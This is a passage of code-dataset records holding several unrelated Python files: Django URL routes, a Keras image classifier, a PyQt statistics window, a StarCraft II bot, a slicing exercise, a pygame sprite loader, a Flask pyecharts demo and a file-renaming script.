path('audiobook-item-delete/<int:pk>/',views.AudiobookItemDelete.as_view(), name='audiobook-item-delete'),\n\n #path('/audio/<int:pk>',)\n]","sub_path":"audio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"283068259","text":"from django.conf.urls import url\n\nfrom . 
import views\napp_name = 'elfs'\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^list/$', views.list, name='list'),\n url(r'^add/$', views.add, name='add'),\n url(r'^search/$', views.search, name='search'),\n url(r'^(?P<slug>[-\\w]+)/$', views.detail, name='detail'),\n]","sub_path":"list/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"539511773","text":"import logging\n\nfrom kerastuner.tuners import RandomSearch\nfrom tensorflow import keras\nfrom tensorflow.keras import regularizers\nfrom tensorflow.keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Flatten\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.python.keras import regularizers\nfrom tensorflow.python.keras.callbacks import EarlyStopping\nfrom tensorflow.python.keras.models import Sequential\n\nlogger = logging.getLogger(__name__)\n\n\nclass A2:\n \"\"\"\n class to create a model\n :param input_dim: the input dimension of the data\n :return: the sequential model\n \"\"\"\n\n def __init__(self, input_dim, X_train, Y_train, X_val, Y_val):\n self.input_shape = input_dim\n self.X_train, self.Y_train = X_train, Y_train\n self.X_val, self.Y_val = X_val, Y_val\n self.model = self.create_model()\n self.model.summary()\n\n def create_model(self):\n self.model = Sequential()\n\n self.model.add(Conv2D(filters=176, kernel_size=(5, 5), input_shape=self.input_shape, padding=\"same\",\n kernel_regularizer=regularizers.l2(l=0.0001), activation='relu'))\n self.model.add(Conv2D(filters=96, kernel_size=(5, 5), padding=\"same\",\n kernel_regularizer=regularizers.l2(l=0.0001), activation='relu'))\n self.model.add(MaxPooling2D(pool_size=(2, 2)))\n\n self.model.add(Conv2D(filters=48, kernel_size=(5, 5), padding=\"same\",\n kernel_regularizer=regularizers.l2(l=0.0001), activation='relu'))\n self.model.add(MaxPooling2D(pool_size=(2, 2)))\n self.model.add(Dropout(0.3))\n\n self.model.add(Flatten())\n\n self.model.add(Dense(800, activation='relu'))\n self.model.add(Dropout(0.5))\n\n self.model.add(Dense(1, activation='sigmoid'))\n\n adam = keras.optimizers.Adam(lr=0.0003)\n\n self.model.compile(loss='binary_crossentropy',\n optimizer=adam,\n metrics=['accuracy'])\n\n return self.model\n\n def train(self):\n \"\"\"\n Fit function\n \"\"\"\n es = EarlyStopping(monitor='val_loss', patience=3)\n\n history = self.model.fit(\n self.X_train, self.Y_train,\n epochs=30,\n verbose=True,\n batch_size=32,\n callbacks=[es],\n validation_data=(self.X_val, self.Y_val))\n\n return self.model, history\n\n def tune_model(self, hp):\n model = keras.Sequential([\n keras.layers.Conv2D(\n filters=hp.Int('conv_1_filter', min_value=32, max_value=128, step=16),\n kernel_size=hp.Choice('conv_1_kernel', values=[3, 4, 5]),\n activation='relu',\n input_shape=self.input_shape\n ),\n keras.layers.MaxPooling2D(pool_size=(2, 2)),\n keras.layers.Dropout(hp.Choice('drop_out', values=[0.2, 0.3, 0.5])),\n\n keras.layers.Conv2D(\n filters=hp.Int('conv_2_filter', min_value=32, max_value=128, step=16),\n kernel_size=hp.Choice('conv_2_kernel', values=[3, 4, 5]),\n activation='relu'\n ),\n keras.layers.MaxPooling2D(pool_size=(2, 2)),\n keras.layers.Dropout(hp.Choice('drop_out', values=[0.2, 0.3, 0.5])),\n\n keras.layers.Conv2D(\n filters=hp.Int('conv_3_filter', min_value=32, max_value=128, step=16),\n kernel_size=hp.Choice('conv_3_kernel', values=[3, 4, 5]),\n activation='relu'\n ),\n keras.layers.MaxPooling2D(pool_size=(2, 
2)),\n keras.layers.Dropout(hp.Choice('drop_out_dense', values=[0.2, 0.3, 0.5])),\n\n keras.layers.Flatten(),\n\n keras.layers.Dense(\n units=hp.Int('dense_1_units', min_value=32, max_value=2048, step=32),\n activation='relu'\n ),\n keras.layers.Dense(1, activation='sigmoid')\n ])\n\n model.compile(optimizer=keras.optimizers.Adam(hp.Choice('learning_rate', values=[0.01, 0.001, 0.0003, 0.0015])),\n loss='binary_crossentropy',\n metrics=['accuracy'])\n\n return model\n\n def fit_tune(self):\n \"\"\"\n Auto Fit function\n \"\"\"\n tuner_search = RandomSearch(self.tune_model,\n objective='val_accuracy',\n max_trials=5, directory='tests/kerastuner_out', project_name=\"task_A2\")\n\n tuner_search.search(self.X_train, self.Y_train, epochs=5, validation_split=0.3)\n\n model = tuner_search.get_best_models(num_models=1)[0]\n\n model.fit(self.X_train, self.Y_train, epochs=25, validation_split=0.3, initial_epoch=5)\n\n return model\n\n def evaluate_model(self, task):\n score = self.model.evaluate(self.X_val, self.Y_val, verbose=0)\n print(\"--------------------------------------------------\")\n print('| Task: %s | loss: %.3f, | Accuracy: %.2f |' % (task, score[0], score[1]))\n print(\"--------------------------------------------------\")\n\n return score[0], score[1]\n\n","sub_path":"A2/A2.py","file_name":"A2.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"258873109","text":"from pickle import load\n\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtCore import pyqtSlot, QObject\nimport cv2\n\nfrom objects.UI import UI\nfrom objects.BrowseFiles import BrowseFilesDialog\nfrom objects.MessageBox import MessageBox\n\n\nclass ResultsWindow(QObject, UI):\n def __init__(self, geometry=None):\n super().__init__()\n self.root = get_root_path(__file__)\n self.graph_path = '{}/data/qt/graph.png'.format(str(self.root))\n self.hist_path = '{}/data/qt/hist.png'.format(str(self.root))\n with open('{}/data/qt/temp/film.pkl'.format(str(self.root)), 'rb') as f:\n self.film = load(f)\n self.geometry = geometry\n\n def setupUi(self, MainWindow):\n if self.geometry:\n MainWindow.resize(self.geometry[2], self.geometry[3])\n else:\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(919, 553)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.frame = QtWidgets.QFrame(self.centralwidget)\n self.frame.setGeometry(QtCore.QRect(0, 0, 555, 475))\n url = \"image: url({});\".format(str(self.graph_path))\n self.frame.setStyleSheet(url)\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.textEdit = QtWidgets.QTextEdit(self.centralwidget)\n self.textEdit.setGeometry(QtCore.QRect(550, 0, 371, 475))\n self.textEdit.setObjectName(\"textEdit\")\n self.layoutWidget = QtWidgets.QWidget(self.centralwidget)\n self.layoutWidget.setGeometry(QtCore.QRect(60, 490, 200, 29))\n self.layoutWidget.setObjectName(\"layoutWidget\")\n self.VisualizationButtons = QtWidgets.QHBoxLayout(self.layoutWidget)\n self.VisualizationButtons.setContentsMargins(0, 0, 0, 0)\n self.VisualizationButtons.setObjectName(\"VisualizationButtons\")\n self.graphButton = QtWidgets.QPushButton(self.layoutWidget)\n self.graphButton.setObjectName(\"graphButton\")\n self.VisualizationButtons.addWidget(self.graphButton)\n self.histButton = QtWidgets.QPushButton(self.layoutWidget)\n 
self.histButton.setObjectName(\"histButton\")\n self.VisualizationButtons.addWidget(self.histButton)\n self.widget = QtWidgets.QWidget(self.centralwidget)\n self.widget.setGeometry(QtCore.QRect(540, 490, 375, 29))\n self.widget.setObjectName(\"widget\")\n self.SaveButtons = QtWidgets.QHBoxLayout(self.widget)\n self.SaveButtons.setContentsMargins(0, 0, 0, 0)\n self.SaveButtons.setObjectName(\"SaveButtons\")\n self.saveStats = QtWidgets.QPushButton(self.widget)\n self.saveStats.setObjectName(\"saveStats\")\n self.SaveButtons.addWidget(self.saveStats)\n self.saveGraphButton = QtWidgets.QPushButton(self.widget)\n self.saveGraphButton.setObjectName(\"saveGraphButton\")\n self.SaveButtons.addWidget(self.saveGraphButton)\n self.saveHistButton = QtWidgets.QPushButton(self.widget)\n self.saveHistButton.setObjectName(\"saveHistButton\")\n self.SaveButtons.addWidget(self.saveHistButton)\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n self.graphButton.clicked.connect(self.graphSlot)\n self.histButton.clicked.connect(self.histSlot)\n self.saveStats.clicked.connect(self.saveStatsSlot)\n self.saveGraphButton.clicked.connect(self.saveGraphSlot)\n self.saveHistButton.clicked.connect(self.saveHistSlot)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.graphButton.setText(_translate(\"MainWindow\", \"Graph\"))\n self.histButton.setText(_translate(\"MainWindow\", \"Histogram\"))\n self.saveStats.setText(_translate(\"MainWindow\", \"Save Statistics\"))\n self.saveGraphButton.setText(_translate(\"MainWindow\", \"Save Graph\"))\n self.saveHistButton.setText(_translate(\"MainWindow\", \"Save Histogram\"))\n\n self.textEdit.setText(\n \"\"\"\n Average Shot Length: {}\\n\n Median Shot Length: {}\\n\n Standard Deviation: {}\\n\n Longest Shot: {}\\n\n Shortest Shot: {}\n \"\"\".format(str(self.film.average_shot_length), str(self.film.median_shot_length), str(self.film.standard_deviation),\n str(max(self.film.shot_lengths)), str(min(self.film.shot_lengths))))\n\n @pyqtSlot()\n def graphSlot(self):\n url = \"image: url({});\".format(str(self.graph_path))\n self.frame.setStyleSheet(url)\n self.app.processEvents()\n\n @pyqtSlot()\n def histSlot(self):\n url = \"image: url({});\".format(str(self.hist_path))\n self.frame.setStyleSheet(url)\n self.app.processEvents()\n\n @pyqtSlot()\n def saveGraphSlot(self):\n dialog = BrowseFilesDialog()\n save_path = dialog.saveFileDialog()\n try:\n img = cv2.imread(self.graph_path)\n except:\n MessageBox('Could not write graph to disk. Check filename. Supported image files are: png, jpg, jpeg, tiff')\n if not img is None:\n try:\n cv2.imwrite(save_path, img)\n except:\n MessageBox('Graph could not be saved for unknown reasons.')\n try:\n test = cv2.imread(save_path)\n if test is not None:\n MessageBox('Graph successfully saved.')\n else:\n MessageBox('Unknown error saving graph. Check if extension is correct. Supported extensions are:'\n 'png, jpg, jpeg, tiff.')\n except:\n MessageBox('Unknown error saving graph. Check if extension is correct. 
Supported extensions are:'\n 'png, jpg, jpeg, tiff.')\n\n @pyqtSlot()\n def saveHistSlot(self):\n dialog = BrowseFilesDialog()\n save_path = dialog.saveFileDialog()\n try:\n img = cv2.imread(self.hist_path)\n except:\n MessageBox('Could not read histogram file. Verify that it exists at: {}'.format(str(self.hist_path)))\n\n if not img is None:\n try:\n cv2.imwrite(save_path, img)\n except:\n MessageBox('Histogram could not be saved for unknown reasons.')\n try:\n test = cv2.imread(save_path)\n if test is not None:\n MessageBox('Histogram successfully saved.')\n else:\n MessageBox('Unknown error saving histogram. Check if extension is correct. Supported extensions are:'\n 'png, jpg, jpeg, tiff.')\n except:\n MessageBox('Unknown error saving histogram. Check if extension is correct. Supported extensions are:'\n 'png, jpg, jpeg, tiff.')\n\n @pyqtSlot()\n def saveStatsSlot(self):\n dialog = BrowseFilesDialog()\n save_path = dialog.saveFileDialog()\n if save_path:\n with open(save_path, 'w+') as f:\n f.write('Number of Shots: {}\\n'.format(str(len(self.film.shot_lengths))))\n f.write('Average Shot Length: {}\\n'.format(str(self.film.average_shot_length)))\n f.write('Median Shot Length: {}\\n'.format(str(self.film.median_shot_length)))\n f.write('Standard Deviation: {}\\n'.format(str(self.film.standard_deviation)))\n f.write('Longest Shot: {}\\n'.format(str(max(self.film.shot_lengths))))\n f.write('Shortest Shot: {}\\n'.format(str(min(self.film.shot_lengths))))\n try:\n with open(save_path, 'r') as f:\n text = f.read()\n if not text:\n MessageBox('Statistics could not be saved for unknown reasons.')\n else:\n MessageBox('Statistics saved successfully.')\n except:\n MessageBox('Statistics could not be saved for unknown reasons.')\n\n\n\n\n\n","sub_path":"owl/objects/Results.py","file_name":"Results.py","file_ext":"py","file_size_in_byte":8374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"159602451","text":"import random\nimport sc2 \nfrom sc2 import run_game, maps, Race, Difficulty, position\nfrom sc2.player import Bot, Computer\nfrom sc2.constants import NEXUS, PROBE, PYLON, ASSIMILATOR, GATEWAY, \\\n CYBERNETICSCORE, STALKER, STARGATE, VOIDRAY, OBSERVER, ROBOTICSFACILITY\nimport cv2\nimport numpy as np\nimport time\n\nfrom examples.protoss.cannon_rush import CannonRushBot\n\nHEADLESS = False\n\nclass SentdeBot(sc2.BotAI):\n def __init__(self):\n self.ITERATIONS_PER_MINUTE = 165\n self.MAX_WORKERS = 50\n self.do_something_after = 0\n self.train_data = []\n\n\n async def on_step(self, iteration):\n self.iteration = iteration\n # print(self.iteration/self.ITERATIONS_PER_MINUTE)\n await self.scout()\n await self.distribute_workers()\n await self.build_workers()\n await self.build_pylons()\n await self.build_assimilators()\n await self.expand()\n await self.offensive_force_buildings()\n await self.build_offensive_force()\n await self.attack()\n\n \n async def build_workers(self):\n if len(self.units(NEXUS))*16 > len(self.units(PROBE)):\n if len(self.units(PROBE)) < self.MAX_WORKERS:\n for nexus in self.units(NEXUS).ready.noqueue:\n if self.can_afford(PROBE):\n await self.do(nexus.train(PROBE))\n \n async def build_pylons(self):\n if self.supply_left < 5 and not self.already_pending(PYLON):\n nexuses = self.units(NEXUS).ready\n if nexuses.exists:\n if self.can_afford(PYLON):\n await self.build(PYLON, near=nexuses.first)\n \n async def build_assimilators(self):\n for nexus in self.units(NEXUS).ready:\n vaspenes = 
self.state.vespene_geyser.closer_than(10.0, nexus)\n for vaspene in vaspenes:\n if not self.can_afford(ASSIMILATOR):\n break\n worker = self.select_build_worker(vaspene.position)\n if worker is None:\n break\n if not self.units(ASSIMILATOR).closer_than(1.0, vaspene).exists:\n await self.do(worker.build(ASSIMILATOR, vaspene))\n \n async def expand(self):\n if self.units(NEXUS).amount < (self.iteration / self.ITERATIONS_PER_MINUTE) and self.can_afford(NEXUS):\n await self.expand_now()\n \n async def build_offensive_force(self):\n for sg in self.units(STARGATE).ready.noqueue:\n if self.can_afford(VOIDRAY) and self.supply_left > 0:\n await self.do(sg.train(VOIDRAY))\n\n async def offensive_force_buildings(self):\n #print(self.iteration / self.ITERATIONS_PER_MINUTE)\n if self.units(PYLON).ready.exists:\n pylon = self.units(PYLON).ready.random\n\n if self.units(GATEWAY).ready.exists and not self.units(CYBERNETICSCORE):\n if self.can_afford(CYBERNETICSCORE) and not self.already_pending(CYBERNETICSCORE):\n await self.build(CYBERNETICSCORE, near=pylon)\n\n elif len(self.units(GATEWAY)) < 1:\n if self.can_afford(GATEWAY) and not self.already_pending(GATEWAY):\n await self.build(GATEWAY, near=pylon)\n\n if self.units(CYBERNETICSCORE).ready.exists:\n if len(self.units(ROBOTICSFACILITY)) < 1:\n if self.can_afford(ROBOTICSFACILITY) and not self.already_pending(ROBOTICSFACILITY):\n await self.build(ROBOTICSFACILITY, near=pylon)\n\n if self.units(CYBERNETICSCORE).ready.exists:\n if len(self.units(STARGATE)) < (self.iteration / self.ITERATIONS_PER_MINUTE):\n if self.can_afford(STARGATE) and not self.already_pending(STARGATE):\n await self.build(STARGATE, near=pylon)\n\n def random_location_variance(self, enemy_start_location):\n x = enemy_start_location[0]\n y = enemy_start_location[1]\n\n x += ((random.randrange(-20, 20))/100) * enemy_start_location[0]\n y += ((random.randrange(-20, 20))/100) * enemy_start_location[1]\n\n if x < 0:\n x = 0\n if y < 0:\n y = 0\n if x > self.game_info.map_size[0]:\n x = self.game_info.map_size[0]\n if y > self.game_info.map_size[1]:\n y = self.game_info.map_size[1]\n\n go_to = position.Point2(position.Pointlike((x,y)))\n return go_to\n \n async def scout(self):\n if len(self.units(OBSERVER)) > 0:\n scout = self.units(OBSERVER)[0]\n if scout.is_idle:\n enemy_location = self.enemy_start_locations[0]\n move_to = self.random_location_variance(enemy_location)\n print(move_to)\n await self.do(scout.move(move_to))\n\n else:\n for rf in self.units(ROBOTICSFACILITY).ready.noqueue:\n if self.can_afford(OBSERVER) and self.supply_left > 0:\n await self.do(rf.train(OBSERVER))\n\n def find_target(self, state):\n if len(self.known_enemy_units) > 0:\n return random.choice(self.known_enemy_units)\n elif len(self.known_enemy_structures) > 0:\n return random.choice(self.known_enemy_structures)\n else:\n return self.enemy_start_locations[0]\n\n async def attack(self):\n if len(self.units(VOIDRAY).idle) > 0:\n choice = random.randrange(0, 4)\n target = False\n if self.iteration > self.do_something_after:\n if choice == 0:\n # no attack\n wait = random.randrange(20, 165)\n self.do_something_after = self.iteration + wait\n\n elif choice == 1:\n #attack_unit_closest_nexus\n if len(self.known_enemy_units) > 0:\n target = self.known_enemy_units.closest_to(random.choice(self.units(NEXUS)))\n\n elif choice == 2:\n #attack enemy structures\n if len(self.known_enemy_structures) > 0:\n target = random.choice(self.known_enemy_structures)\n\n elif choice == 3:\n #attack_enemy_start\n target = 
self.enemy_start_locations[0]\n\n if target:\n for vr in self.units(VOIDRAY).idle:\n await self.do(vr.attack(target))\n y = np.zeros(4)\n y[choice] = 1\n\n\nrun_game(\n maps.get(\"AbyssalReefLE\"), \n [\n Bot(Race.Protoss, SentdeBot()),\n Computer(Race.Terran, Difficulty.Easy)\n ],\n realtime=False\n)","sub_path":"py_agent.py","file_name":"py_agent.py","file_ext":"py","file_size_in_byte":6698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"184163410","text":"\"\"\"\nTitle: slicing_lab\nDate: 10/25/2019\nDev: K.Shaffer\n\n\"\"\"\n\n\n# Swaps first and last entry\ndef exchange_First_last(sequence):\n first = sequence[0]\n last = sequence[-1]\n\n if type(sequence) == str:\n sequence = last + sequence[1:-1] + first\n\n if type(sequence) == tuple:\n sequence = (last,) + sequence[1:-1] + (first,)\n\n return sequence\n# Removes every other entry\ndef remove_Every_Other(sequence):\n sequence = sequence[1::2]\n return sequence\n\n# Swaps first 4 and last 4 entries\ndef first_Four_Last_Four(sequence):\n first4 = sequence[0:4]\n last4 = sequence[-4:]\n sequence = last4 + sequence[4:-4] +first4\n return sequence\n\n# Reverses all entries\ndef reverse(sequence):\n sequence = sequence[::-1]\n return sequence\n\n# Slices sequence in thirds and reorders them\ndef thirds(sequence):\n length = int(len(sequence) / 3)\n first = sequence[:length]\n second = sequence[length:-length]\n third = sequence[-length:]\n sequence = second + third + first\n return sequence\n\n\n# Tests\n\ns = \"this is a string\"\ns1 = \"ThrTwoOne\"\nt = (2, 54, 13, 12, 5, 32)\nt1 = (1, 2, 3, 4, 5, 6, 7, 8)\n\nassert exchange_First_last(s) == \"ghis is a strint\"\nassert exchange_First_last(t) == (32, 54, 13, 12, 5, 2)\nassert remove_Every_Other(s) == \"hsi tig\"\nassert remove_Every_Other(t) == (54, 12, 32)\nassert first_Four_Last_Four(s) == \"ring is a stthis\"\nassert first_Four_Last_Four(t1) == (5, 6, 7, 8, 1, 2, 3, 4)\nassert reverse(s) == \"gnirts a si siht\"\nassert reverse(t) == (32, 5, 12, 13, 54, 2)\nassert thirds(s1) == \"TwoOneThr\"\nassert thirds(t) == (13, 12, 5, 32, 2, 54)\n","sub_path":"students/K_Shaffer/lesson03/slicing_lab.py","file_name":"slicing_lab.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"386951560","text":"import pygame, os\n\ndef getImages():\n # General Sprites\n spriteList, imageList = [], []\n for root, dirs, files in os.walk('./Sprites/General/'):\n for name in files:\n if name.endswith('.png'):\n full_name = os.path.join(root, name)\n spriteList.append(name[:-4])\n imageList.append(pygame.image.load(full_name))\n IMAGESDICT = dict(zip(spriteList, imageList))\n\n # Item Sprites\n itemnameList = [image[:-4] for image in os.listdir('./Sprites/Items/') if image.endswith('.png')]\n imageList = [pygame.image.load('./Sprites/Items/' + image) for image in os.listdir('./Sprites/Items/') if image.endswith('.png')]\n ITEMDICT = dict(zip(itemnameList, imageList))\n # Just name of file\n\n # Unit Sprites\n unitnameList, imageList = [], []\n for root, dirs, files in os.walk('./Sprites/Characters/'):\n for name in files:\n if name.endswith('.png'):\n full_name = os.path.join(root, name)\n unitnameList.append(name[:-4])\n imageList.append(pygame.image.load(full_name))\n UNITDICT = dict(zip(unitnameList, imageList))\n \n return IMAGESDICT, UNITDICT, ITEMDICT\n\nif __name__ == '__main__':\n 
getImages()\n","sub_path":"imagesDict.py","file_name":"imagesDict.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"603076008","text":"#encoding=utf-8\nfrom flask import Flask\nimport random\nfrom pyecharts import Scatter3D\n#from pyecharts.constants import DEFAULT_HOSTS\nfrom flask import Flask, render_template\nfrom pyecharts_javascripthon.api import TRANSLATOR\nfrom pyecharts import Bar\napp = Flask(__name__)\n\nREMOTE_HOST = \"https://pyecharts.github.io/assets/js\"\n@app.route('/')\ndef hello_world():\n s3d = scatter3d()\n return render_template(\n \"pyecharts.html\",\n myechart=s3d.render_embed(),\n host=REMOTE_HOST,\n script_list=s3d.get_js_dependencies(),\n )\n\ndef scatter3d():\n data = [generate_3d_random_point() for _ in range(80)]\n range_color = [\n \"#313695\",\n \"#4575b4\",\n \"#74add1\",\n \"#abd9e9\",\n \"#e0f3f8\",\n \"#fee090\",\n \"#fdae61\",\n \"#f46d43\",\n \"#d73027\",\n \"#a50026\",\n ]\n scatter3D = Scatter3D(\"3D scattering plot demo\", width=1200, height=600)\n scatter3D.add(\"\", data, is_visualmap=True, visual_range_color=range_color)\n return scatter3D\n\ndef generate_3d_random_point():\n return [\n random.randint(0, 100), random.randint(0, 100), random.randint(0, 100)\n ]\n\n@app.route('/one')\ndef app_1():\n bar = Bar(\"一周邮件量\", \"海南邮政数据中心\")\n bar.add(\"当日递\", [\"周一\", \"周二\", \"周三\", \"周四\", \"周五\", \"周六\",\"周日\"], [5, 20, 36, 10, 75, 90,28])\n bar.add(\"次日递\", [\"周一\", \"周二\", \"周三\", \"周四\", \"周五\", \"周六\",\"周日\"], [25, 10, 56, 70, 25, 40,88])\n ret_html = render_template('pyecharts.html',\n myechart=bar.render_embed(),\n mytitle=u\"数据演示\",\n host='/static',\n script_list=bar.get_js_dependencies())\n return ret_html\n@app.route('/two')\ndef app_2():\n from pyecharts import Gauge\n gauge = Gauge(\"业务量完成情况\",\"函件\",width=600, height=300)\n gauge.add(\"海口\", \"\", 86.66,scale_range=[0,100],angle_range=[180,0])\n\n gauge1 = Gauge(\"业务收入完成情况\",\"函件\",width=600, height=300)\n gauge1.add(\"海口\", \"\", 88.99)\n ret_html = render_template('pyecharts.html',\n myechart=gauge.render_embed()+gauge1.render_embed(),\n mytitle=u\"数据演示\",\n host='/static',\n script_list=gauge.get_js_dependencies())\n return ret_html\n\n@app.route('/three')\ndef app_3():\n _bar = bar_chart()\n javascript_snippet = TRANSLATOR.translate(_bar.options)\n return render_template(\n \"mypyecharts.html\",\n chart_id=_bar.chart_id,\n host=REMOTE_HOST,\n renderer=_bar.renderer,\n my_width=\"100%\",\n my_height=600,\n custom_function=javascript_snippet.function_snippet,\n options=javascript_snippet.option_snippet,\n script_list=_bar.get_js_dependencies(),\n )\n\ndef bar_chart():\n bar = Bar(\"我的第一个图表\", \"这里是副标题\")\n # bar.use_theme('dark')\n attr = [\"衬衫\", \"羊毛衫\", \"雪纺衫\", \"裤子\", \"高跟鞋\", \"袜子\"]\n bar.add(\n \"商家A\", attr, [5, 20, 36, 10, 75, 90],is_more_utils=True\n )\n bar.add(\n \"商家B\", attr, [5, 20, 36, 10, 75, 90],is_more_utils=True\n )\n return bar\n\n\nif __name__ == '__main__':\n app.run(host=\"127.0.0.1\", port=9999)\n","sub_path":"flashecharts.py","file_name":"flashecharts.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"632757403","text":"import os\n# from pathlib import Path\nimport re\nimport regexUpper\nfrom contextlib import contextmanager\n\n# regexUpper.main() # check module is working\n\n\n@contextmanager\ndef change_dir(destination):\n try:\n cwd = os.getcwd()\n 
os.chdir(destination)\n yield\n finally:\n os.chdir(cwd)\n\n\n# txtFilePath = Path.cwd() / 'Desktop/GperturbNew/StableStructures/textFiles'\n# txtFilePath = Path.cwd().parent / 'textFiles'\n\nsims = ['A', 'B', 'CS1', 'CS2', 'CS3', 'CS4',\n 'CS5', 'CS6', 'D2', 'DS1', 'E', 'MartinICandFinalEddandOM', 'softD2']\n\nmodules = [\"readVDF_2_new\", \"fileLsts\", \"readVDF2\", \"VDFnetwork\", \"readVDF\",\n \"TimeEvolutionGammaKappaBeta\", \"Sigma\", \"readVDF_2_new\"]\n\n# folders = [f'{txtFilePath}/{i}' for i in sims]\n\n'''\nfor i in sims:\n vars()[i] = f'{txtFilePath}/{i}'\n'''\n\nfile_name = ''\nline = ''\n# readfile = f'{modules[2]}.txt'\n# writefile = f'{modules[2]}_copy.txt'\nreadfile = 'testfile.txt'\nwritefile = 'testfile_copy.txt'\n\nfilename_dict = {'Hernquist': 'HQ',\n 'Hq': 'HQ',\n 'Osipkov': 'O',\n 'Merritt': 'M',\n 'phi': 'Phi',\n 'theta': 'Theta',\n 'Gamma_-1.50': 'Gamma_-1.5',\n 'Gamma_-2.00': 'Gamma_-2.0',\n 'Gamma_-2.50': 'Gamma_-2.5',\n 'Gamma_-3.00': 'Gamma_-3.0'\n }\n\nline_dict = {'Eddington': 'Edd',\n 'perturbation': 'Pert',\n 'Hernquist': 'HQ',\n 'Hq': 'HQ',\n 'Osipkov_Merritt': 'OM',\n 'Osipkov': 'O',\n 'Merritt': 'M',\n 'figure_path': 'figurePath',\n 'datalist_innerbin': 'bin1',\n 'datalist_first_middlebin': 'bin2',\n 'datalist_second_middlebin': 'bin3',\n 'datalist_outerbin': 'bin4',\n 'list_of_files_': 'FileLst',\n 'innerbin_': 'bin1',\n 'first_middlebin_': 'bin2',\n 'second_middlebin_': 'bin3',\n 'outerbin_': 'bin4',\n 'radial_bins': 'RBins',\n 'R_limit': 'Rlim',\n 'Almost_Final': 'SecondLast',\n 'phi': 'Phi',\n 'theta': 'Theta',\n '_new_R_middle_': '',\n 'large_R_middle_19_95_': 'bin5',\n 'large_R_middle_31_62_': 'bin6',\n '_large_R_middle_': '',\n '\\'/Users/gustav.c.rasmussen': 'os.getcwd() + \\'',\n 'Red': 'r',\n 'Green': 'g',\n 'Black': 'k',\n 'Blue': 'b',\n '_average_inside_bin_': '_BinAvg_',\n '_avg_in_bin_': '_BinAvg_',\n 'average_': 'avg_',\n 'color=': '',\n 'color =': '',\n ' )': ')',\n 'data, label': 'data, _'\n }\n\n\ndef find_replace_multi_ordered(string, dictionary):\n # sort keys by length, in reverse order\n for item in sorted(dictionary.keys(), key=len, reverse=True):\n string = re.sub(item, dictionary[item], string)\n return string\n\n\ns = \"HEREABCISABCACSAMPLEABCSTRING\"\nd = {\"C\": \"-\", \"ABC\": \"-\", \"CSAMPLEABC\": \"-:)-\"}\n# find_replace_multi_ordered(s, d)\n\n\ndef file_replace(From: str, to: str, in_str: str=''):\n \"\"\".\"\"\"\n if in_str in file_name:\n return file_name.replace(From, to)\n return file_name\n\n\ndef rename_files(files):\n for f in files:\n if f == '.DS_Store':\n continue\n file_name, file_ext = os.path.splitext(f)\n # print(file_name)\n # for k, v in filename_dict.items():\n # file_name = file_replace(k, v)\n file_name = find_replace_multi_ordered(file_name, filename_dict)\n file_name = file_replace('rad', 'R', 'Sigmarad')\n file_name = file_replace('tan', 'T', 'Sigmatan')\n if ('LargeRMiddle' in file_name) and ('RMiddle' in file_name):\n file_name = file_name.replace('LargeRMiddle', '')\n file_name = file_name.replace('RMiddle', 'LargeRMiddle')\n new_name = regexUpper.regex_sub_upper(file_name)\n new_file = f'{new_name}{file_ext}'\n # print(f'{new_file}')\n os.rename(f, new_file)\n\n\ndef line_replace(From: str, to: str, in_str: str=''):\n \"\"\".\"\"\"\n if in_str in line:\n return line.replace(From, to)\n return line\n\n\ndef replace_lines():\n with open(readfile, \"r\") as rf, open(writefile, \"w\") as wf:\n for line in rf:\n # for k, v in line_dict.items():\n # line = line_replace(k, v)\n line = 
find_replace_multi_ordered(line, line_dict)\n # line = line_replace('yan', '', 'cyan')\n # line = line_replace('agenta', '', 'magenta')\n # line = line_replace('hite', '', 'white')\n if any(x in line for x in ['Sigmarad', 'sigmarad']):\n line = line.replace('rad', 'R')\n if any(x in line for x in ['Sigmatan', 'sigmatan']):\n line = line.replace('tan', 'T')\n # if label, ls: swap to ls, label.\n # Put ls and color together.\n if re.findall(regexUpper.pattern_1, line):\n print(line)\n # print(re.sub(regexUpper.sub_pattern, '', line))\n line = re.sub(regexUpper.sub_pattern, '', line)\n print(line)\n wf.write(line)\n\n\ndef main():\n # print(readfile, writefile)\n replace_lines()\n '''\n print(len(os.listdir()))\n with change_dir(sims[0]):\n # print(os.listdir())\n rename_files(os.listdir())\n '''\n\n\nif __name__ == '__main__':\n 